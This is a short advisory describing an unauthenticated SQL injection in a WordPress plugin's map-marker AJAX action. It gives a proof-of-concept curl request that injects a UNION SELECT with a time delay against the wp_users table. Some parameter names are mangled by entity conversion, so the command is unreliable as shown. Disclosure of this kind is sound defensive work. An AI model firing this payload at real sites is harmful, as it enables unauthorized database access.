Description The plugin does not sanitise and escape a parameter before using it in a SQL statement via an AJAX action available to unauthenticated users, leading to a SQL injection with different techniques like UNION, Time-Based and Error-Based.
curl --url ‘http://vulnerable-site.tld/wp-admin/admin-ajax.php’ --data ‘action=w2dc_get_map_marker_info&locations;_ids%5B%5D=1+UNION+SELECT+null%2C68%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%2Csleep(10)+FROM+wp_users↦_id=1&show;_summary_button=1&show;_readmore_button=1’